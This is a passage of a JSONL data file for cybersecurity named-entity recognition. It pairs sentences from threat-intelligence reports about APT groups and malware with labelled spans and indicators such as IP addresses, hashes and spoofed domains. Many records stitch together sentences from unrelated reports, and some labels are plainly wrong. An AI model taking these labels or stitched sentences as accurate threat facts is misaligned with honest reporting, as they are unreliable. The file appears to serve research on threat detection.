Our primary observation was of the Infy ( non-M ) malware , which primarily functions as a keylogger for the collection of account credentials .", "spans": {"Organization: aerospace": [[131, 140]], "Organization: telecommunications": [[143, 161]], "Organization: finance industries": [[168, 186]], "Organization: Palo Alto Networks": [[189, 207]], "Malware: Infy": [[379, 383], [431, 435]], "Malware: Infy M.": [[388, 395]], "Malware: non-M": [[438, 443]], "Malware: malware": [[446, 453]], "Malware: keylogger": [[487, 496]]}, "info": {"id": "cyberner_stix_valid_000747", "source": "cyberner_stix_valid"}} {"text": "The campaign identifiers found in these two samples are respectively , “ alkavkaz.com20081105 ” and “ cihaderi.net20081112 ” .", "spans": {}, "info": {"id": "cyberner_stix_valid_000748", "source": "cyberner_stix_valid"}} {"text": "In this case the persistence is achieved by loading the original explorer.exe from its startup location and , using DLL side-loading , passing the execution control to the stage 4 malware ( discussed in next section ) . While having access to the organization 's environment , the Magic Hound targeted data related to entities in the Middle East . 4c02b13441264bf18cc63603b767c3d804a545a60c66ca60512ee59abba28d4d Malware/Backdoor 658 KB ( 674 , 304 bytes ) PE32 executable for MS Windows ( DLL ) ( console ) Intel 80386 32-bit September 2018 . 
COSMICENERGY lacks discovery capabilities , which implies that to successfully execute an attack the malware operator would need to perform some internal reconnaissance to obtain environment information , such as MSSQL server IP addresses , MSSQL credentials , and target IEC-104 device IP addresses .", "spans": {"Indicator: 4c02b13441264bf18cc63603b767c3d804a545a60c66ca60512ee59abba28d4d": [[348, 412]], "System: Windows": [[480, 487]], "Organization: Intel": [[508, 513]], "Malware: COSMICENERGY": [[544, 556]]}, "info": {"id": "cyberner_stix_valid_000749", "source": "cyberner_stix_valid"}} {"text": "Timing of the spear phishing emails sent to the victims .", "spans": {}, "info": {"id": "cyberner_stix_valid_000750", "source": "cyberner_stix_valid"}} {"text": "The CIA also runs a very substantial effort to infect and control Microsoft Windows users with its malware . There is the exploit code and malware used to gain access to systems , the infrastructure that provides command and control to the malware operator , and the human elements – developers who create the malware , operators who deploy it , and analysts who extract value from the stolen information .", "spans": {"Indicator: exploit code": [[122, 134]]}, "info": {"id": "cyberner_stix_valid_000751", "source": "cyberner_stix_valid"}} {"text": "As we now know , by February 2013 the Dukes group had been operating MiniDuke and other toolsets for at least 4 and a half years .", "spans": {"Malware: MiniDuke": [[69, 77]]}, "info": {"id": "cyberner_stix_valid_000752", "source": "cyberner_stix_valid"}} {"text": "What it does FrozenCell masquerades as fake updates to chat applications like Facebook , WhatsApp , Messenger , LINE , and LoveChat . The method , which technically redirects users through local DNS poisoning , requires a fair bit of work ; recreating and maintaining fake bank sites can be an arduous task , but Kessem claims the group behind GozNym – Nymaim – appear up to the task . 
APT1 has used and steadily modified BISCUIT since as early as 2007 and continues to use it presently . Whether known as commodity malware or “ as - a - service , ” threat actors have long been turning to their fellow adversaries in the hopes of selling off their tools and opening a new stream of revenue .", "spans": {"Malware: FrozenCell": [[13, 23]], "System: Facebook": [[78, 86]], "System: WhatsApp": [[89, 97]], "System: Messenger": [[100, 109]], "System: LINE": [[112, 116]], "System: LoveChat": [[123, 131]], "Organization: bank": [[273, 277]], "Organization: Kessem": [[313, 319]], "Malware: BISCUIT": [[422, 429]], "Malware: commodity malware": [[506, 523]]}, "info": {"id": "cyberner_stix_valid_000753", "source": "cyberner_stix_valid"}} {"text": "The previous two volumes of the Microsoft Security Intelligence Report explored the activities of two such groups , code-named STRONTIUM and PLATINUM , which used previously unknown vulnerabilities and aggressive , persistent techniques to target specific individuals and institutions — often including military installations , intelligence agencies , and other government bodies . The attacks appear to be geopolitically motivated and target high profile organizations .", "spans": {"Organization: specific individuals": [[247, 267]], "Organization: institutions": [[272, 284]], "Organization: military": [[303, 311]], "Organization: intelligence agencies": [[328, 349]], "Organization: government": [[362, 372]], "Organization: high profile organizations": [[443, 469]]}, "info": {"id": "cyberner_stix_valid_000754", "source": "cyberner_stix_valid"}} {"text": "Some of the checks performed previously are immediately sent to the C2 , like the safetyNet , admin and defaultSMSApp . Operating since 2012 , the Molerats group 's activity has been reported by Norman , Kaspersky , FireEye , and PwC . DUDELL : SHA256 : 0d61d9baab9927bb484f3e60384fdb6a3709ca74bc6175ab16b220a68f2b349e . 
The vulnerability , which could allow attackers to gain escalated privileges and unauthorized access to an environment , was first disclosed on May 31st in a security bulletin released by Progress .", "spans": {"Organization: Norman": [[195, 201]], "Organization: Kaspersky": [[204, 213]], "Organization: FireEye": [[216, 223]], "Organization: PwC": [[230, 233]], "Malware: DUDELL": [[236, 242]], "Indicator: 0d61d9baab9927bb484f3e60384fdb6a3709ca74bc6175ab16b220a68f2b349e": [[254, 318]], "Organization: Progress": [[509, 517]]}, "info": {"id": "cyberner_stix_valid_000755", "source": "cyberner_stix_valid"}} {"text": "This feature is implemented using another open-source software package that can be found here . To further exemplify the proficiency of the attackers leveraging the Lamberts toolkit , deployment of Black Lambert included a rather sophisticated TTF zero day exploit , CVE-2014-4148 . APT12 's targets are consistent with larger People's Republic of China ( PRC ) goals . Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis / parsing of network data .", "spans": {"Vulnerability: zero day exploit": [[248, 264]], "Vulnerability: CVE-2014-4148": [[267, 280]], "Organization: People's Republic of China": [[327, 353]], "Organization: PRC": [[356, 359]]}, "info": {"id": "cyberner_stix_valid_000756", "source": "cyberner_stix_valid"}} {"text": "While actors from China , Iran , Russia , and North Korea remain the most active cyber espionage threats tracked and responded to by FireEye , APT32 reflects a growing host of new countries that have adopted this dynamic capability . 
The most recent Scarlet Mimic attacks we have identified were conducted in 2015 and suggest the group has a significant interest in both Muslim activists and those interested in critiques of the Russian government and Russian President Vladimir Putin .", "spans": {"Organization: FireEye": [[133, 140]], "Organization: Muslim activists": [[371, 387]], "Organization: Russian government": [[429, 447]]}, "info": {"id": "cyberner_stix_valid_000757", "source": "cyberner_stix_valid"}} {"text": "For example , if a victim has Viber on their device , it will choose to retrieve the Viber Update second stage . The attackers first infected in March 2017 . This function is the entry point of the service . As nations committed to upholding the rules - based international order in cyberspace , the United States and its allies and partners are taking steps to defend against Russia ’s irresponsible actions .", "spans": {"System: Viber": [[30, 35]], "System: Viber Update": [[85, 97]], "Organization: the United States": [[296, 313]]}, "info": {"id": "cyberner_stix_valid_000758", "source": "cyberner_stix_valid"}} {"text": "spear phishing : 5.254.100.200 .", "spans": {"Indicator: 5.254.100.200": [[17, 30]]}, "info": {"id": "cyberner_stix_valid_000759", "source": "cyberner_stix_valid"}} {"text": "therefore , those using CosmicDuke to target drug dealers and those targeting governments are two separate entities .", "spans": {"Malware: CosmicDuke": [[24, 34]]}, "info": {"id": "cyberner_stix_valid_000760", "source": "cyberner_stix_valid"}} {"text": "In later versions , instead of the name of the command , its numerical code was transmitted . CTU researchers have observed the TG-3390 employing legitimate Kaspersky antivirus variants in analyzed samples . Since discovering the operations of this group in 2018 , Outlaw continues to use scripts , codes , and commands that have been previously used and deployed . 
For Snort coverage that can detect the exploitation of these vulnerabilities , download the latest rule sets from Snort.org , and our latest Vulnerability Advisories are always posted on Talos Intelligence ’s website .", "spans": {"Organization: CTU": [[94, 97]], "Organization: Kaspersky": [[157, 166]]}, "info": {"id": "cyberner_stix_valid_000761", "source": "cyberner_stix_valid"}} {"text": "Based on our investigations into OnionDuke , we believe that for about 7 months , from April 2014 to when Leviathan published their blog post in October 2014 , the Tor exit node identified by the researchers was being used to wrap executables on-the-fly with OnionDuke ( image 7 , page 13 ) .", "spans": {"Malware: OnionDuke": [[33, 42], [259, 268]], "Organization: Leviathan": [[106, 115]]}, "info": {"id": "cyberner_stix_valid_000762", "source": "cyberner_stix_valid"}} {"text": ") As of this writing , no files were hosted at any of the links . In addition , the attackers employed hacking tools of Chinese origin and that are prevalent on Chinese underground hacking forums . Threat : Gamaredon Pteranodon implant SFX archive . Adversaries may utilize command - line interfaces ( CLIs ) to interact with systems and execute commands .", "spans": {"Malware: Pteranodon": [[217, 227]]}, "info": {"id": "cyberner_stix_valid_000763", "source": "cyberner_stix_valid"}} {"text": "Once X-Agent was implanted on the DNC and DCCC networks , Second Lieutenant Artem Malyshev ( AKA \" djangomagicdev \" and \" realblatr \" ) monitored the implants through the command and control network configured for the task .", "spans": {"Malware: X-Agent": [[5, 12]]}, "info": {"id": "cyberner_stix_valid_000764", "source": "cyberner_stix_valid"}} {"text": "The legitimate version of this app is also available on Google Play . Kaspersky will continue to monitor the BlackEnergy attacks in Ukraine and update our readers with more data when available . 
ScarCruft infected this victim on September 21, 2018 .", "spans": {"System: Google Play": [[56, 67]], "Organization: Kaspersky": [[70, 79]]}, "info": {"id": "cyberner_stix_valid_000765", "source": "cyberner_stix_valid"}} {"text": "During the investigations , Mandiant observed that FIN7 used a custom shim database to patch both the 32-bit and 64-bit versions of services.exe with their CARBANAK payload . The attackers used the popular Poison Ivy RAT and WinHTTPHelper malware to compromise the computers of government officials .", "spans": {"Organization: Mandiant": [[28, 36]], "Malware: services.exe": [[132, 144]], "Malware: Poison Ivy RAT": [[206, 220]], "Malware: WinHTTPHelper": [[225, 238]], "Malware: malware": [[239, 246]], "Organization: government officials": [[278, 298]]}, "info": {"id": "cyberner_stix_valid_000766", "source": "cyberner_stix_valid"}} {"text": "For now , the best protection is to avoid any APK attachments that arrive on mobile phones via e-mail . In August 2014 , some of our users observed targeted attacks with a variation of CVE-2012-0158 and an unusual set of malware . 
We collected two sets of Clayslide samples that appear to be created during the OilRig actor 's development phase of their attack lifecycle .", "spans": {"Vulnerability: CVE-2012-0158": [[185, 198]], "Malware: Clayslide samples": [[256, 273]]}, "info": {"id": "cyberner_stix_valid_000767", "source": "cyberner_stix_valid"}} {"text": "At the beginning of February 2018 , we discovered an attack targeting two government institutions related to foreign affairs .", "spans": {}, "info": {"id": "cyberner_stix_valid_000768", "source": "cyberner_stix_valid"}} {"text": "The cluster on the right is actually collapsing one collection of entities due to the sheer size of it .", "spans": {}, "info": {"id": "cyberner_stix_valid_000769", "source": "cyberner_stix_valid"}} {"text": "McAfee Advanced Threat Research analysts have uncovered a global data reconnaissance campaign assaulting a wide number of industries including critical infrastructure , entertainment , finance , health care , and telecommunications . Our observation of Infy 's campaigns , primarily through the lens of spearphishing attacks against Iranian civil society and media organizations , indicates a wandering focus on particular demographics on a strategic basis over time .", "spans": {"Organization: McAfee Advanced Threat Research": [[0, 31]], "Organization: critical infrastructure": [[143, 166]], "Organization: entertainment": [[169, 182]], "Organization: finance": [[185, 192]], "Organization: health care": [[195, 206]], "Organization: telecommunications": [[213, 231]], "Organization: civil society": [[341, 354]], "Organization: media organizations": [[359, 378]]}, "info": {"id": "cyberner_stix_valid_000770", "source": "cyberner_stix_valid"}} {"text": "It searches for mobile banking applications , removes them and uploads counterfeit versions . However , to our knowledge , this is the first time Turla has used Metasploit as a first stage backdoor , instead of relying on one of its own tools such as Skipper . 
To copy memory , the memcpy function is invoked . The code hunted for several security products to evade – including Kaspersky .", "spans": {"Organization: security products": [[339, 356]], "Organization: Kaspersky": [[378, 387]]}, "info": {"id": "cyberner_stix_valid_000771", "source": "cyberner_stix_valid"}} {"text": "Therefore , if we convince the attacker to request the file “ secret_info.doc ( 20KB ) ” , we can instead return to the server any file of our choice , of any size or type .", "spans": {"Indicator: secret_info.doc": [[62, 77]], "Indicator: 20KB": [[80, 84]]}, "info": {"id": "cyberner_stix_valid_000772", "source": "cyberner_stix_valid"}} {"text": "The tool investigates the Local Security Authority Subsystem memory space in order to find , decrypt and display retrieved passwords . Zahlungsinformationen digitec.zip .", "spans": {"Malware: tool": [[4, 8]], "Indicator: Zahlungsinformationen digitec.zip": [[135, 168]]}, "info": {"id": "cyberner_stix_valid_000773", "source": "cyberner_stix_valid"}} {"text": "109.248.148.42 /agr-enum/progress-inform/cube.php?res= .", "spans": {"Indicator: 109.248.148.42": [[0, 14]]}, "info": {"id": "cyberner_stix_valid_000774", "source": "cyberner_stix_valid"}} {"text": "Buried among this new treasure trove , there are several mentions of previously disclosed NSA top secret programs and software such as \" STRAITBIZARRE \" , used to control implants remotely , and \" JEEPFLEA \" , a project to hack the money transferring system SWIFT . 
One of the IP addresses , 128.127.105.13 , was previously used by the DoNot Team (aka APT-C-35 ) , a suspected Indian APT group .", "spans": {"Organization: NSA": [[90, 93]], "Indicator: 128.127.105.13": [[292, 306]]}, "info": {"id": "cyberner_stix_valid_000775", "source": "cyberner_stix_valid"}} {"text": "The stream of bytes is encrypted ( in some versions there is also optional compression step ) .", "spans": {}, "info": {"id": "cyberner_stix_valid_000776", "source": "cyberner_stix_valid"}} {"text": "The Trojan stores information about C & C servers and the data harvested from the infected device in a local SQLite database . In May 2018 , Trend Micro found a new sample ( Detected as W2KM_DLOADR.UHAOEEN ) that may be related to this campaign . We concluded that Lazarus Group was responsible for WannaCry , a destructive malware .", "spans": {"Organization: Trend Micro": [[141, 152]], "Malware: W2KM_DLOADR.UHAOEEN": [[186, 205]], "Malware: WannaCry": [[299, 307]]}, "info": {"id": "cyberner_stix_valid_000777", "source": "cyberner_stix_valid"}} {"text": "However , additional research on the C2 server 109.248.148.42 revealed a new .NET version of Zekapab that is designed for the same purpose . iDefense analysts recently came across the following malicious document that is purportedly related to the recent BREXIT negotiations between the UK and the EU .", "spans": {"Indicator: 109.248.148.42": [[47, 61]], "Malware: Zekapab": [[93, 100]], "Organization: iDefense": [[141, 149]], "Organization: EU": [[298, 300]]}, "info": {"id": "cyberner_stix_valid_000778", "source": "cyberner_stix_valid"}} {"text": "Per their webpage , NTG “ was established primarily to cater the growing demands of Petrochemicals waste management within the Kingdom of Saudi Arabia ” . 
maps-modon.club : The maps-modon.club domain appears to spoof maps.modon.gov.sa , which is associated with the Saudi Industrial Property Authority , an organization “ responsible for the development of industrial cities with integrated infrastructure and services ” .", "spans": {"Indicator: maps-modon.club": [[155, 170], [177, 192]], "Indicator: maps.modon.gov.sa": [[217, 234]], "Organization: Saudi Industrial Property Authority": [[266, 301]]}, "info": {"id": "cyberner_stix_valid_000779", "source": "cyberner_stix_valid"}} {"text": "Functionality After starting , DEFENSOR ID requests the following permissions : allow modify system settings permit drawing over other apps , and activate accessibility services . TA505 used Wizard (.wiz) files in this campaign , with FlawedAmmyy RAT as the final payload . The most common communication mode for a RAT is to act as a client to a remote server .", "spans": {"Malware: DEFENSOR ID": [[31, 42]], "Malware: RAT": [[315, 318]]}, "info": {"id": "cyberner_stix_valid_000780", "source": "cyberner_stix_valid"}} {"text": "Most websites compromised by TG-3390 actors are affiliated with five types of organizations around the world :", "spans": {}, "info": {"id": "cyberner_stix_valid_000781", "source": "cyberner_stix_valid"}} {"text": "Who is behind Judy ? In October 2017 , a DHS advisory documented ALLANITE technical operations combined with activity with a group Symantec calls Dragonfly ( which Dragos associates with DYMALLOY ) . The string is sent to the remote host and the response is checked to see if the first byte of the response is 0xF4, an arbitrary byte . 
The form also contains legitimate macro code modified by the attacker to call malicious subroutines .", "spans": {"Malware: Judy": [[14, 18]], "Organization: DHS": [[41, 44]], "Organization: Symantec": [[131, 139]], "Organization: Dragos": [[164, 170]]}, "info": {"id": "cyberner_stix_valid_000782", "source": "cyberner_stix_valid"}} {"text": "This file duped targets into believing it was a Flash player installer that would drop a Windows batch to invoke PowerShell into the same C2 communications .", "spans": {"System: Windows": [[89, 96]]}, "info": {"id": "cyberner_stix_valid_000783", "source": "cyberner_stix_valid"}} {"text": "The honeynet graphs , which show activity peaks associated with specific actions , also suggest that the scans were timed .", "spans": {}, "info": {"id": "cyberner_stix_valid_000784", "source": "cyberner_stix_valid"}} {"text": "This framework enables attackers to operate in robust , horizontally segmented ecosystems , specializing in developing certain parts of the framework , and selling or leasing to others ; such frameworks are resistant to takedowns and individual component failures .", "spans": {}, "info": {"id": "cyberner_stix_valid_000785", "source": "cyberner_stix_valid"}} {"text": "The Silence.Main Trojan , which is the main stage of the attack , has a full set of commands to control a compromised computer . 
Kaspersky Lab also found some watering hole attacks , including one on a website belonging to a prominent member of the Japanese government .", "spans": {"Malware: Silence.Main Trojan": [[4, 23]], "Organization: Kaspersky Lab": [[129, 142]]}, "info": {"id": "cyberner_stix_valid_000786", "source": "cyberner_stix_valid"}} {"text": "The delivery document used in this attack was last modified by a user named ‘ Nick Daemoji ’ , which provides a linkage to previous Sofacy related delivery documents .", "spans": {}, "info": {"id": "cyberner_stix_valid_000787", "source": "cyberner_stix_valid"}} {"text": "In their latest leak , they have released the UNITEDRAKE NSA exploit , which is a remote access and control tool that can remotely target Windows-based systems to capture desired information and transfer it to a server . While the Sima moniker could similarly originate from software labels , it is a common female Persian name and a Persian-language Word for \" visage \" or \" appearance \" . Given its use in more advanced social engineering campaigns against women 's rights activists , the label seem particularly apt .", "spans": {"Vulnerability: UNITEDRAKE NSA exploit": [[46, 68]], "Organization: social engineering campaigns": [[422, 450]], "Organization: women 's rights activists": [[459, 484]]}, "info": {"id": "cyberner_stix_valid_000788", "source": "cyberner_stix_valid"}} {"text": "The Pitty Tiger group mostly uses spear phishing in order to gain an initial foothold within the targeted environment . 
To ensure persistence in the system MoneyTaker relies on PowerShell and VBS scripts - they are both difficult to detect by antivirus and easy to modify .", "spans": {"Malware: PowerShell": [[177, 187]], "Malware: VBS scripts": [[192, 203]]}, "info": {"id": "cyberner_stix_valid_000789", "source": "cyberner_stix_valid"}} {"text": "If an attacker was able to compromise an organization's network administrator credentials , the attacker would be able to change that particular organization's DNS records at will . we detected an ongoing campaign targeting a national data center .", "spans": {}, "info": {"id": "cyberner_stix_valid_000790", "source": "cyberner_stix_valid"}} {"text": "Visually , this can be represented as follows : Android ID When combined with our analysis of indexed directories on C2 infrastructure , we were able to easily automate the generation of the password used by each device and , in turn , successfully decompress all exfiltrated content from compromised devices . Resecurity says that IRIDIUM \" has hit more than 200 government agencies , oil and gas companies , and technology companies including Citrix . Finally , some zones used by APT1 reflect a business theme . 
As an example , we took the twitter login page , which implemented the following CSP rule ( which contains ): The following short JS code inserted into the site will send the credentials to google - analytics console controlled by us : The UA-#######- # parameter is the tag ID owner that Google Analytics uses to connect the data to a specific account .", "spans": {"System: Android": [[48, 55]], "Organization: Resecurity": [[311, 321]], "Organization: government agencies": [[364, 383]], "Organization: oil": [[386, 389]], "Organization: gas companies": [[394, 407]], "Organization: technology companies": [[414, 434]], "Organization: Citrix": [[445, 451]], "System: CSP": [[596, 599]], "System: Google Analytics": [[804, 820]]}, "info": {"id": "cyberner_stix_valid_000791", "source": "cyberner_stix_valid"}} {"text": "The earliest identified sample , however , can be traced back to Jan. 18 , 2016 . NEODYMIUM also used the exact same CVE-2016-4117 exploit code that PROMETHIUM used , prior to public knowledge of the vulnerability 's existence . Threat : Gamaredon Pteranodon loader dot file . This type of vulnerability is known as a server - side request forgery ( SSRF ) .", "spans": {"Vulnerability: CVE-2016-4117": [[117, 130]], "Malware: Pteranodon": [[248, 258]], "Vulnerability: server - side request forgery ( SSRF )": [[317, 355]]}, "info": {"id": "cyberner_stix_valid_000792", "source": "cyberner_stix_valid"}} {"text": "This is likely done to keep the developers from being prosecuted in their own countries or being extradited between countries . In September 2017 , we discovered a new targeted attack on financial institutions . Basically , two servers in the same IP range and AS14576 ( autonomous system ) share a non-standard SSH port , which is 222 . 
These restrictions are specified by a list of allowed URIs .", "spans": {"Organization: financial institutions": [[187, 209]], "System: a list of allowed URIs": [[374, 396]]}, "info": {"id": "cyberner_stix_valid_000793", "source": "cyberner_stix_valid"}} {"text": "It 's probable that Patchwork uses this package to facilitate server installation when using a Windows environment . The Tibetan community has been targeted for over a decade by espionage operations that use malware to infiltrate communications and gather information .", "spans": {"Organization: Tibetan community": [[121, 138]], "Malware: malware": [[208, 215]]}, "info": {"id": "cyberner_stix_valid_000794", "source": "cyberner_stix_valid"}} {"text": "] it server1na.exodus.connexxa [ . Custom payloads utilized by TEMP.Veles in investigations conducted by Mandiant are typically weaponized versions of legitimate open-source software , retrofitted with code used for command and control . Sending machine information and a heartbeat to the C2 : The group has since earned infamy for being involved in malicious activities associated with targeted attacks , such as deploying spear - phishing campaigns and building a backdoor .", "spans": {"Organization: Mandiant": [[105, 113]]}, "info": {"id": "cyberner_stix_valid_000795", "source": "cyberner_stix_valid"}} {"text": "While Google did not share with us the total number of infected devices , they confirmed that one of these malicious apps collected over 350 installations through the Play Store , while other variants collected few dozens each , and that all infections were located in Italy . Clearly , OilRig incorporates a testing component within their development process , as we have previously observed OilRig performing testing activities on their delivery documents and their TwoFace webshells . The first trick is the check of the serial number of the disk . 
Between April 2022 and March 2023 , 39 % of the gang 's attacks hit education , compared to an average of just 4 % across all the other ransomware groups tracked by Malwarebytes .", "spans": {"System: Play Store": [[167, 177]], "Organization: education": [[620, 629]], "Organization: Malwarebytes": [[717, 729]]}, "info": {"id": "cyberner_stix_valid_000796", "source": "cyberner_stix_valid"}} {"text": "ThreatConnect has identified a KASPERAGENT malware campaign leveraging decoy Palestinian Authority documents .", "spans": {"Organization: ThreatConnect": [[0, 13]], "Malware: KASPERAGENT": [[31, 42]], "Organization: Palestinian Authority": [[77, 98]]}, "info": {"id": "cyberner_stix_valid_000797", "source": "cyberner_stix_valid"}} {"text": "It seems the actor wants to execute the final payload very carefully , and wants to evade detection by behavior-based detection solutions .", "spans": {}, "info": {"id": "cyberner_stix_valid_000798", "source": "cyberner_stix_valid"}} {"text": ") are filled in and verified . So far , it appears threat actors have deployed the Bookworm Trojan primarily in attacks on targets in Thailand . Zero-days can be highly disruptive because they provide a window of time for an attacker to breach victims before the vendor is able to apply a software update to address the specific security hole . Derusbi has used unencrypted HTTP on port 443 for C2.[12 ]", "spans": {"Vulnerability: Zero-days": [[145, 154]], "Malware: Derusbi": [[345, 352]]}, "info": {"id": "cyberner_stix_valid_000799", "source": "cyberner_stix_valid"}} {"text": "To continue my analysis , I shifted focus to Maltego so as to visually graph the infrastructure .", "spans": {}, "info": {"id": "cyberner_stix_valid_000800", "source": "cyberner_stix_valid"}} {"text": "APT34 often uses compromised accounts to conduct spear-phishing operations . 
The packer is the same but the malware tries to exploit the undiscovered bug in the UPX library that causes unpack failure .", "spans": {}, "info": {"id": "cyberner_stix_valid_000801", "source": "cyberner_stix_valid"}} {"text": "We attribute the attacks on these customers using three popular IoT devices to an activity group that Microsoft refers to as STRONTIUM .", "spans": {"Organization: Microsoft": [[102, 111]]}, "info": {"id": "cyberner_stix_valid_000802", "source": "cyberner_stix_valid"}} {"text": "The beaconing will only start after the application is removed from the background , ultimately stopping it . The DNSMessenger malware is a shared tool , used by FIN7 , MuddyWater and perhaps other groups . If the file tmp.vbs does in fact contain similar content as that of office.vbs , then it could be another method for downloading payloads onto the target . The Malware contains some other commands to do but not all of them are implemented yet .", "spans": {"Indicator: tmp.vbs": [[219, 226]], "Indicator: office.vbs": [[275, 285]], "Malware: The Malware": [[363, 374]]}, "info": {"id": "cyberner_stix_valid_000803", "source": "cyberner_stix_valid"}} {"text": "This is a notable behavior that is characteristic of this ransomware family . The Ke3chang group also used keyloggers and their own .NET tool to enumerate folders and dump data from Microsoft Exchange mailboxes . This serves as a decoy, an attempt to hide the content of the other ZIP . 
Does your organization possess any PII or regulated data such as payment card data , health care data , social security numbers or bank accounts Financially motivated attacks", "spans": {"Organization: PII": [[322, 325]]}, "info": {"id": "cyberner_stix_valid_000804", "source": "cyberner_stix_valid"}} {"text": "The group , almost certainly comprised of a sophisticated and prolific set of developers and operators , has historically collected intelligence on defense and geopolitical issues .", "spans": {}, "info": {"id": "cyberner_stix_valid_000805", "source": "cyberner_stix_valid"}} {"text": "Strategic threat intelligence includes an assessment of the ongoing threat posed by the threat group .", "spans": {}, "info": {"id": "cyberner_stix_valid_000806", "source": "cyberner_stix_valid"}} {"text": "In order to collect even more information , from time to time the Zebrocy operators upload and use dumpers on victims ’ machines .", "spans": {"Malware: Zebrocy": [[66, 73]]}, "info": {"id": "cyberner_stix_valid_000807", "source": "cyberner_stix_valid"}} {"text": "To install Chrysaor , we believe an attacker coaxed specifically targeted individuals to download the malicious software onto their device . The attachments exploited CVE-2017-8759 which was discovered and documented only five days prior to the campaign . C&C server URL . New technologies are constantly introduced within the industry , and healthcare has experienced a rapid transition to use of connected devices , which puts stress on security teams to keep up .", "spans": {"Malware: Chrysaor": [[11, 19]], "Vulnerability: CVE-2017-8759": [[167, 180]], "Vulnerability: rapid transition to use of connected devices": [[371, 415]], "Vulnerability: stress on security teams to keep up": [[429, 464]]}, "info": {"id": "cyberner_stix_valid_000808", "source": "cyberner_stix_valid"}} {"text": "Configuration file received from the C & C server As for stealth and resilience , the attacker uses a number of tricks . 
Group-IB has uncovered a hacker group , MoneyTaker , attacking banks in the USA and Russia . Download a file from the Internet .", "spans": {"Organization: Group-IB": [[121, 129]], "Organization: banks": [[184, 189]]}, "info": {"id": "cyberner_stix_valid_000809", "source": "cyberner_stix_valid"}} {"text": "A number of different C&C domains and IP addresses were identified .", "spans": {}, "info": {"id": "cyberner_stix_valid_000810", "source": "cyberner_stix_valid"}} {"text": "Research on the malicious IP address 109.248.148.42 revealed two different .dotm components :", "spans": {"Indicator: 109.248.148.42": [[37, 51]], "Indicator: .dotm": [[75, 80]]}, "info": {"id": "cyberner_stix_valid_000811", "source": "cyberner_stix_valid"}} {"text": "As the research progressed , it started to reveal unique characteristics which made us believe we were looking at an all-new malware campaign found in the wild . As mentioned in our previous blog on Bookworm , the Trojan sends a static date string to the C2 server that we referred to as a campaign code . Kaspersky ’s research notes that BlackOasis hacked into computers based in Saudi Arabia . 
Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used .", "spans": {"Organization: Kaspersky": [[306, 315]]}, "info": {"id": "cyberner_stix_valid_000812", "source": "cyberner_stix_valid"}} {"text": "More importantly , the Command & Control server ( 176.31.112.10 ) also appears to be using an outdated version of OpenSSL and be vulnerable to Heartbleed attacks .", "spans": {"Indicator: 176.31.112.10": [[50, 63]], "Vulnerability: Heartbleed": [[143, 153]]}, "info": {"id": "cyberner_stix_valid_000813", "source": "cyberner_stix_valid"}} {"text": "Research presented in this report shows that the PUTTER PANDA operators are likely members of the 12th Bureau , 3rd General Staff Department ( GSD ) of the People 's Liberation Army ( PLA ) , operating from the unit 's headquarters in Shanghai with MUCD 61486 . BalkanRAT enables the attacker to remotely control the compromised computer via a graphical interface , i.e. , manually; BalkanDoor enables them to remotely control the compromised computer via a command line , i.e. 
, possibly en masse .", "spans": {"Organization: People 's Liberation Army": [[156, 181]], "Organization: PLA": [[184, 187]], "Indicator: BalkanRAT": [[262, 271]], "Indicator: BalkanDoor": [[383, 393]]}, "info": {"id": "cyberner_stix_valid_000814", "source": "cyberner_stix_valid"}} {"text": "Additionally , the use of what appear to be carefully crafted documents at the very least designed to look like official government correspondence suggests the malware may have been intended for a government employee or contractor who would be interested in the documents ’ subject matter .", "spans": {}, "info": {"id": "cyberner_stix_valid_000815", "source": "cyberner_stix_valid"}} {"text": "This adversary has a wide range of implants at their disposal , which have been developed over the course of many years and include Sofacy , X-Agent , X-Tunnel , WinIDS , Foozer and DownRage droppers , and even malware for Linux , OSX , IOS , Android and Windows Phones .", "spans": {"Malware: X-Agent": [[141, 148]], "Malware: WinIDS": [[162, 168]], "Malware: Foozer": [[171, 177]], "Malware: DownRage": [[182, 190]], "System: Linux": [[223, 228]], "System: OSX": [[231, 234]], "System: IOS": [[237, 240]], "System: Android": [[243, 250]], "System: Windows": [[255, 262]]}, "info": {"id": "cyberner_stix_valid_000816", "source": "cyberner_stix_valid"}} {"text": "Umbrella , our secure internet gateway ( SIG ) , blocks users from connecting to malicious domains , IPs , and URLs , whether users are on or off the corporate network . Talos has uncovered documents that we assess with moderate confidence are associated with suspected persistent threat actor MuddyWater . This particular MOF file creates a timer event that is triggered every five seconds . 
The adversary may drop or create malware , tools , or other non - native files on a target system to accomplish this , potentially leaving behind traces of malicious activities .", "spans": {"Organization: Talos": [[170, 175]]}, "info": {"id": "cyberner_stix_valid_000817", "source": "cyberner_stix_valid"}} {"text": "Figure 19 : C & C infrastructure diagram The Infection Landscape “ Agent Smith ” droppers show a very greedy infection tactic . Clever Kitten 's goal is to eventually be able to masquerade as a legitimate user by compromising credentials either through a pass-the-hash attack , or by dumping password hashes from a compromised host . They automatically update all of Dexphot ’s components , both upon system reboot as well as every 90 or 110 minutes while the system is running . Based on our telemetry , we have identified an array of affected victims including US - based retailers , local governments , a university , and an engineering firm .", "spans": {"Malware: Agent Smith": [[67, 78]], "Malware: Dexphot": [[367, 374]], "Organization: US - based retailers": [[563, 583]], "Organization: local governments": [[586, 603]], "Organization: university": [[608, 618]], "Organization: engineering firm": [[628, 644]]}, "info": {"id": "cyberner_stix_valid_000818", "source": "cyberner_stix_valid"}} {"text": "The DDE instructions also included another command that it did not run , which suggests it is an artifact of a prior version of this delivery document .", "spans": {}, "info": {"id": "cyberner_stix_valid_000819", "source": "cyberner_stix_valid"}} {"text": "In case of Uri Terror Report.doc the malicious activity triggered when the document was either closed or when the show document button was clicked , when any of these event occurs a malicious obfuscated function ( chugnnarabashkoim() ) gets called .", "spans": {"Indicator: Uri Terror Report.doc": [[11, 32]]}, "info": {"id": "cyberner_stix_valid_000820", "source": "cyberner_stix_valid"}} {"text": "This actor has 
